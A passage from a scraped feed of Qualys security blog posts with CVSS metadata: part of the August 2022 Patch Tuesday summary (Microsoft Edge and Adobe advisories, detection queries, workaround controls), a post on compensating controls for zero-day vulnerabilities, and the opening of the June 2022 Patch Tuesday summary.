email. \n\nThe user would have to click on a specially crafted URL to be compromised by the attacker.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33649>)[CVE-2022-33636](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33636>), [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33636>)[CVE-2022-35796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35796>) | Microsoft Edge (Chromium-based) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.3/10. _[Per Microsoft's severity guidelines](<https://www.microsoft.com/en-us/msrc/bounty-new-edge>), the amount of user interaction or preconditions required to allow this sort of exploitation downgraded the severity. The CVSS scoring system doesn't allow for this type of nuance._\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. However, in all cases, an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through email.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released five (5) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 25 vulnerabilities affecting Adobe Acrobat and Reader, Commerce, FrameMaker, Illustrator, and Premiere Elements applications. Of these 25 vulnerabilities, 15 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 7.8/10 to 9.1/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-38](<https://helpx.adobe.com/security/products/magento/apsb22-38.html>) | Security update available for Adobe Commerce\n\nThis update resolves seven (7) vulnerabilities:\n\n * Four (4) **_[_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n * One (1) **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Commerce and Magento Open Source. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>), [important](<https://helpx.adobe.com/security/severity-ratings.html>), and [moderate](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution, privilege escalation, and security feature bypass.\n\n* * *\n\n### [APSB22-39](<https://helpx.adobe.com/security/products/acrobat/apsb22-39.html>) | Security update available for Adobe Acrobat and Reader\n\nThis update resolves seven (7) vulnerabilities:\n\n * Three (3) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Four (4) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-41](<https://helpx.adobe.com/security/products/illustrator/apsb22-41.html>) | Security Updates Available for Adobe Illustrator\n\nThis update resolves four (4) vulnerabilities:\n\n * Two (2) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Illustrator 2022. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities that could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-42](<https://helpx.adobe.com/security/products/framemaker/apsb22-42.html>) | Security update available for Adobe FrameMaker\n\nThis update resolves six (6) vulnerabilities:\n\n * Five (5) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * One (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe FrameMaker. This update addresses multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution \nand memory leak. \n\n* * *\n\n### [APSB22-43](<https://helpx.adobe.com/security/products/premiere_elements/apsb22-43.html>) | Security update available for Adobe Premiere Elements\n\nThis update resolves one (1) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe FrameMaker. This update addresses multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution \nand memory leak. \n\n* * *\n\n# **About Qualys Patch Tuesday**\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n## Qualys [Threat Protection](<https://www.qualys.com/apps/threat-protection/>) High-Rated Advisories for August 1-9, 2022 _New Content_\n\n * [Microsoft Patches 121 Vulnerabilities with Two Zero-days and 17 Critical; Plus 20 Microsoft Edge (Chromium-Based) in August 2022 Patch Tuesday](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n * [VMware vRealize Operations Multiple Vulnerabilities Patched in the Latest Security update (CVE-2022-31672, CVE-2022-31673, CVE-2022-31674, & CVE-2022-31675)](<https://threatprotect.qualys.com/2022/08/10/vmware-vrealize-operations-multiple-vulnerabilities-patched-in-the-latest-security-update-cve-2022-31672-cve-2022-31673-cve-2022-31674-cve-2022-31675/>)\n * [Cisco Patched Small Business RV Series Routers Multiple Vulnerabilities (CVE-2022-20827, CVE-2022-20841, and CVE-2022-20842)](<https://threatprotect.qualys.com/2022/08/04/cisco-patched-small-business-rv-series-routers-multiple-vulnerabilities-cve-2022-20827-cve-2022-20841-and-cve-2022-20842/>)\n * [VMware Patched Multiple Vulnerabilities in VMware Products including Identity Manager (vIDM) and Workspace ONE Access](<https://threatprotect.qualys.com/2022/08/03/vmware-patched-multiple-vulnerabilities-in-vmware-products-including-identity-manager-vidm-and-workspace-one-access/>)\n * [Atlassian Confluence Server and Confluence Data Center \u2013 Questions for Confluence App \u2013 Hardcoded Password Vulnerability (CVE-2022-26138)](<https://threatprotect.qualys.com/2022/08/01/atlassian-confluence-server-and-confluence-data-center-questions-for-confluence-app-hardcoded-password-vulnerability-cve-2022-26138/>)\n\n* * *\n\n## Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`50121` OR qid:`91929` OR qid:`91931` OR qid:`91932` OR qid:`91933` OR qid:`91934` OR qid:`91935` OR qid:`91936` OR qid:`110413` OR qid:`110414` OR qid:`376813` ) \n\n\n\n [A Deep Dive into VMDR 2.0 with Qualys TruRisk\u2122](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>) _The old way of ranking vulnerabilities doesn\u2019t work anymore. Instead, enterprise security teams need to rate the true risks to their business. In this blog, we examine each of the risk scores delivered by Qualys TruRisk, the criteria used to compute them, and how they can be used to prioritize remediation._\n\n* * *\n\n## Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`50121` OR qid:`91929` OR qid:`91931` OR qid:`91932` OR qid:`91933` OR qid:`91934` OR qid:`91935` OR qid:`91936` OR qid:`110413` OR qid:`110414` OR qid:`376813` ) \n\n\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n## Evaluate Vendor-Suggested Workarounds with [Policy Compliance](<https://www.qualys.com/forms/policy-compliance/>) _New Content_\n\nQualys\u2019 [Policy Compliance Control Library](<https://vimeo.com/700790353>) makes it easy to evaluate your technology infrastructure when the current situation requires the implementation of a vendor-suggested workaround. A workaround is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn't working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. _ [Source](<https://www.techtarget.com/whatis/definition/workaround>)_\n\nThe following Qualys [Policy Compliance Control IDs (CIDs), and System Defined Controls (SDC) ](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/module_pc/controls/controls_lp.htm>)have been updated to support Microsoft recommended workaround for this Patch Tuesday:\n\n#### **[CVE-2022-35793](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35793>) | Windows Print Spooler Elevation of Privilege (EoP) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 7.3/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 1368: Status of the \u2018Print Spooler\u2019 service\n * 21711: Status of the \u2018Allow Print Spooler to accept client connections\u2019 group policy setting \n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### **[CVE-2022-35804](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35804>)** | **SMB Client and Server Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 24476: Status of the SMBv3 Client compressions setting\n * 20233: Status of the SMBv3 Server compressions setting \n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### ****[CVE-2022-35755](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35755>)** | **Windows Print Spooler Elevation of Privilege (EoP) Vulnerability****\n\nThis vulnerability has a CVSSv3.1 score of 7.3/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 1368: Status of the \u2018Print Spooler\u2019 service\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### **[CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>)**, **[CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>)** | **Windows Point-to-Point Protocol (PPP) Remote Code Execution (RCE) Vulnerability** \n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 11220: List of \u2018Inbound Rules\u2019 configured in Windows Firewall with Advanced Security via GPO\n * 14028: List of \u2018Outbound Rules\u2019 configured in Windows Firewall with Advanced Security via GPO\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\n#### **[CVE-2022-34715](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715>): Windows Network File System Remote Code Execution (RCE) Vulnerability** \n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 24139: Status of the Windows Network File System (NFSV4) service\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\n#### ****[CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>): Active Directory Domain Services Elevation of Privilege (EoP) Vulnerability****\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 4079: Status of the \u2018Active Directory Certificate Service\u2019\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\nThe following QQL will return a posture assessment for the CIDs for this Patch Tuesday:\n \n \n control:( id:`1368` OR id:`4079` OR id:`11220` OR id:`14028` OR id:`20233` OR id:`21711` OR id:`24139` OR id:`24476` ) \n\n\n\n [Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/23/mitigating-the-risk-of-zero-day-vulnerabilities-by-using-compensating-controls>)\n\n [Policy Compliance (PC) | Policy Library Update Blogs](<https://notifications.qualys.com/tag/policy-library>)\n\n* * *\n\n##### Patch Tuesday is Complete.\n\n* * *\n\n# Qualys Monthly Webinar Series \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. \n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities & Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-09T20:00:00", "type": "qualysblog", "title": "August 2022 Patch Tuesday | Microsoft Releases 121 Vulnerabilities with 17 Critical, plus 20 Microsoft Edge (Chromium-Based); Adobe Releases 5 Advisories, 25 Vulnerabilities with 15 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20827", "CVE-2022-20841", "CVE-2022-20842", "CVE-2022-22047", "CVE-2022-2294", "CVE-2022-26138", "CVE-2022-30133", "CVE-2022-30134", "CVE-2022-30190", "CVE-2022-31672", "CVE-2022-31673", "CVE-2022-31674", "CVE-2022-31675", "CVE-2022-33636", "CVE-2022-33646", "CVE-2022-33649", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34691", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-35744", "CVE-2022-35755", "CVE-2022-35766", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35796", "CVE-2022-35804"], "modified": "2022-08-09T20:00:00", "id": "QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-23T18:02:10", "description": "_Zero-day vulnerability attacks have emerged as a major cybersecurity threat in the last few years. Organizations most often targeted include large enterprises and government/Federal agencies. However, any organization, regardless of its size, business, or industry, is a potential target for zero-day threats._\n\nMost notably, already publicly disclosed. This means that **one out of every four **zero-day exploits detected could potentially have been avoided if a more thorough investigation and patching effort had been pursued. In 2021, around 58 zero-day vulnerabilities were reported, more than double the total for the previous year. This is a definite cause for alarm. As of June 2022, Google\u2019s project had identified 18 zero-day vulnerabilities so far this year. \n\n\n\nHere are some well-known examples of zero-day attacks:\n\n * Most recently, the [Follina zero-day vulnerability](<https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr>)\n * [Log4j](<https://www.qualys.com/log4shell-cve-2021-44228/>) (2021)\n * Chrome (2021)\n * [Zoom](<https://blog.qualys.com/qualys-insights/2020/04/06/secure-remote-endpoints-from-vulnerabilities-in-video-conferencing-productivity-applications-like-zoom>) (2020)\n * [Apple iOS](<https://blog.qualys.com/vulnerabilities-threat-research/2021/10/18/apple-fixes-zero-day-in-ios-and-ipados-15-0-2-emergency-release-detect-and-prioritize-vulnerabilities-using-vmdr-for-mobile-devices>) (2020)\n * Microsoft Windows, Eastern Europe (2019)\n\n### Why Are Zero-Day Attacks/Exploits so Dangerous?****\n\nThe biggest challenge in cybersecurity remains **to secure what can\u2019t be seen.**\n\nZero-day attacks occur without warning, which makes them difficult to protect against. They take advantage of previously unknown vulnerabilities that have yet to be patched. In some cases, the software vendor is not even aware that the weakness exists. \n\nThe time between initial disclosure of a new vulnerability and its exploitation is shrinking. Yet the time to fix a vulnerability is not shrinking at the same rate. This gives attackers ample time to run rampant and launch zero-day attacks on defenseless targets. Unfortunately, it can still take days, weeks, or even months for fixes to be released. An enterprise may be forced to use the vulnerable/compromised software that entire time, exposing both its mission critical machines and sensitive data.\n\nEven worse, once a zero-day patch is released, not all organizations are quick to implement it.\n\n### How Qualys Policy Compliance Helps Combat Zero-Day Threats\n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) is a next-generation solution for continuous cyber risk reduction and effective compliance with internal policies, industry mandates, and government regulations. It helps enterprises of any size to respond to zero-day threats. Here\u2019s how:\n\n#### Detecting New Vulnerabilities ****\n\nThe Qualys Research Team analyzes zero-day vulnerabilities published from various sources (e.g. [Microsoft Patch Tuesday](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/09/august-2022-patch-tuesday>)), including vendor advisories that help accurately detect these vulnerabilities. They identify workarounds and create compensatory controls accordingly which help to detect these vulnerabilities in the IT environment.\n\n#### Mitigating Risk with Compensating Controls ****\n\nQualys Policy Compliance (PC) has a rich library of security controls that can be used to compensate for various zero-day vulnerabilities across different technologies and platforms. Qualys continuously releases new compensatory controls for new zero-day vulnerabilities as soon as a vulnerability is disclosed where no patch is yet available.\n\nWhile no organization can completely protect themselves from a zero-day attack, organizations are able to detect new zero-day vulnerabilities and mitigate the risk associated with them with Qualys PC compensatory controls.\n\nHere is a current list of current zero-day vulnerabilities for which Qualys PC has compensatory controls.\n\n#### Zero-day Vulnerabilities, 2020-2022\n\nHere is a listing of zero-day threats disclosed over the past three years, with links to Qualys blogs analyzing the CVEs (where applicable).\n\n**CVE ID**| **Vulnerability name**| **Control ID**| **Control Title** \n---|---|---|--- \nCVE-2022-30190 | Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190) AKA [\u201cFollina\u201d](<https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr>) | 24074| Status of the 'Microsoft Support Diagnostic Tool (MSDT)' service \nCVE-2022-20695| Cisco Wireless LAN Controller Management Interface Authentication Bypass Vulnerability| 23670| Status of mac filter compatibility mode \nCVE-2022-22965| [Spring framework](<https://blog.qualys.com/vulnerabilities-threat-research/2022/03/31/spring-framework-zero-day-remote-code-execution-spring4shell-vulnerability>) RCE| 23425| List of Java versions and processes present on the host \nCVE-2021-4034| [PwnKit: Local Privilege Escalation Vulnerability](<https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034>)| 22844| Status of the SUID bit for /usr/bin/pkexec \nCVE-2021-4104 \nCVE-2021-44228 \nCVE-2021-45046 \nCVE-2021-45105| [Log4j Remote Code Execution (RCE)](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell>)| 22639| Detection of the Apache Log4j Remote Code Execution (RCE) vulnerability (Log4Shell) (Linux) \nCVE-2021-4104 \nCVE-2021-44228 \nCVE-2021-45046 \nCVE-2021-45105| [Log4j Remote Code Execution (RCE)](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell>)| 22638| Detection of the Apache Log4j Remote Code Execution (RCE) vulnerability (Log4Shell) (Windows) \nCVE-2021-34527| [Windows Print Spooler Remote Code Execution Vulnerability](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/07/microsoft-windows-print-spooler-rce-vulnerability-printnightmare-cve-2021-34527-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| 21711| Status of the 'Allow Print Spooler to accept client connections' group policy setting \nCVE-2021-34527| | 19071| Status of the 'Point and Print Restrictions: When updating drivers for an existing connection' setting \nCVE-2021-34527| | 19070| Status of the 'Point and Print Restrictions: When installing drivers for a new connection' setting \nCVE-2021-34527| | 1368| Status of the 'Print Spooler' service \nCVE-2020-10148| [SolarWinds Orion API Authentication Bypass Vulnerability](<https://blog.qualys.com/vulnerabilities-threat-research/2021/01/04/technical-deep-dive-into-solarwinds-breach>)| 20645| Status of 'match-url' for rewrite rule 'PassValidSkipi18nRequest' where 'type' is None (Site-Level) \nCVE-2020-10148| | 20644| Status of 'match-url' for rewrite rule 'PassValidi18nRequest' where 'type' is None (Site-Level) \nCVE-2020-10148| | 20643| Status of 'match-url' parameter for rewrite rule 'BLockOtherSkipi18nRequest' where 'statuscode' is 403 (Site-Level) \nCVE-2020-10148| | 20642| Status of 'match-url' parameter for rewrite rule 'BLockOtheri18nRequest' where 'statuscode' is 403 (Site-Level) \nCVE-2020-10148| | 20641| Status of 'match-url' parameter for rewrite rule 'BLockInvalidAxdRequest' where 'statuscode' is 403 (Site-Level) \nCVE-2020-11993| Apache HTTPD Server HTTP/2 module memory crash| 19188| The Status of the 'LogLevel' directive in the Apache configuration file (Server Level) \nCVE-2020-9490| Apache HTTPD Server HTTP/2 push crash| 19187| Status of the 'H2Push' directive in the apache configuration file (Server Level) \nCVE-2020-16898| [Windows TCP/IP Remote Code Execution Vulnerability](<https://blog.qualys.com/product-tech/2020/10/14/microsoft-windows-tcp-ip-remote-code-execution-vulnerability-cve-2020-16898-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| 19571| Status of the 'RA Based DNS Config (RFC 6106)' parameter of network interface (Qualys Agent only) \nCVE-2020-1350| [KB4569509: DNS Server Vulnerability](<https://blog.qualys.com/vulnerabilities-threat-research/2020/07/20/automatically-discover-prioritize-and-remediate-windows-dns-vulnerability-cve-2020-1350-using-qualys-vmdr>)| 18935| Status of the 'TcpReceivePacketSize' parameter within the 'HKLM\\System\\CurrentControlSet\\Services\\DNS\\Parameters' registry key \n \n#### Identifying Compensatory Controls ****\n\nUsing Qualys Policy Compliance\u2019s new user interface, users will be able to verify the compliance posture of these controls by just looking at the CVEID/vulnerability unique identifier. As demonstrated below, It will be easy to search it by using the QQL token **control.vulnerabiity.cveId:** and then to create a dashboard from the results (see below).\n\nIdentifying the compensatory controls using the CVE ID\n\n### Benefit of Qualys Policy Compliance for Zero-Day Threats****\n\nThe main benefit of Qualys Policy Compliance is \u201cDefense in Depth\u201d.\n\nEnterprises can make their security architecture stronger by assessing and fixing any misconfigurations, and then deploy patches easily once they are available, to reduce the organization\u2019s overall cyber risk.\n\nThe initial assessment gives Cybersecurity teams insights into their current security posture. It plays an important role in mitigating the risk posed by zero-day vulnerabilities while the IT environment is vulnerable and until a vendor patch is released. However, organizations can add one more layer of security to their environment by leveraging Qualys PC controls to identify misconfigurations and provide the solution to mitigate them. Qualys researchers work around the clock analyzing zero-day vulnerabilities and release configuration assessment controls to detect and mitigate publicly known zero-day vulnerabilities.\n\n#### Remediate Misconfigurations using Qualys Policy Compliance AutoRemediation ****\n\nQualys Policy Compliance doesn\u2019t just detect misconfigurations associated with zero-day vulnerabilities, but also remediates them at scale using its AutoRemediation feature. After fixing the misconfiguration with AutoRemediation, users have reduced the overall risk posed by any particular vulnerability.\n\nLet\u2019s examine a specific example, using the recently disclosed [zero-day vulnerability commonly known as Follina](<https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr>).\n\nSecurity posture of compensating controls for Follina vulnerability\n\nWith misconfigurations associated with Follina, the risk is high:\n\nCyber risk from Follina is high\u2026 without a fix\n\nThe control has failed. The following series of screenshots show how users can remediate the control using Qualys PC Auto-Remediation:\n\nStep 1: Assess the misconfigured control Step 2: Choose to remediate the failure Step 3: Name the remediation Job Step 4: Select the control Step 5: Go to the script library\n\nNext, users can select a remediation script:\n\nStep 6: Select the remediation script from the library\n\nThen they select the asset for remediation:\n\nStep 7: Select assets to remediate Step 8: Track status of the remediation job\n\nAfter successful execution of the remediation script, the control is remediated, and security posture is changed from Fail to Pass.\n\nCyber risk has been reduced after fixing the misconfiguration.\n\nRemediation reduces Applied Risk Score\n\n#### Executing Workarounds using Qualys Custom Assessment and Remediation****\n\n[Qualys Custom Assessment and Remediation](<https://www.qualys.com/apps/custom-assessment-remediation/>) allows security practitioners to quickly create and execute custom scripts and controls, and then to take immediate action to directly remediate problems and apply mitigations. From Qualys PC, users can perform the provided mitigation steps by creating a PowerShell script and executing it on the vulnerable assets.\n\nWatch this short looping video demonstrating how easy it is to execute remediation jobs in Qualys.\n\nApplying workaround for Follina vulnerability using Qualys Custom Assessment & Remediation\n\n### Summary****\n\nQualys Policy Compliance is not only a leading provider of security recommendations across CIS and DISA standards, but also provides out-of-the-box recommendations and compensating controls. This combination secures enterprise IT infrastructure from known zero-day vulnerabilities when no patch is available, thereby reducing the overall cyber risk associated with any zero-day vulnerability.\n\n### Getting Started\n\nReady to get started? Learn more about how Qualys Policy Compliance provides different configuration assessment controls. [Sign up for a free trial today.](<https://www.qualys.com/forms/policy-compliance/>)\n\n### contributors\n\n * Mukesh Choudhary, Compliance Research Analyst, Qualys\n * Mohd Anas Khan, Compliance Research Analyst, Qualys\n * Vikas Gothwal, Senior Compliance Research Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-23T10:46:04", "type": "qualysblog", "title": "Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10148", "CVE-2020-11993", "CVE-2020-1350", "CVE-2020-16898", "CVE-2020-9490", "CVE-2021-34527", "CVE-2021-4034", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-20695", "CVE-2022-22965", "CVE-2022-30190"], "modified": "2022-08-23T10:46:04", "id": "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T21:57:29", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 55 vulnerabilities (aka flaws) in the June 2022 update, including three (3) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE). This month's Patch Tuesday cumulative Windows update includes the fix for one (1) zero-day vulnerability ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)). Microsoft also released an advisory for Intel Processor MMIO Stale Data Vulnerabilitie to address four (4) Intel vulnerabilities ([Microsoft Advisory 220002](<https://msrc.microsoft.com/update-guide/vulnerability/ADV220002>), 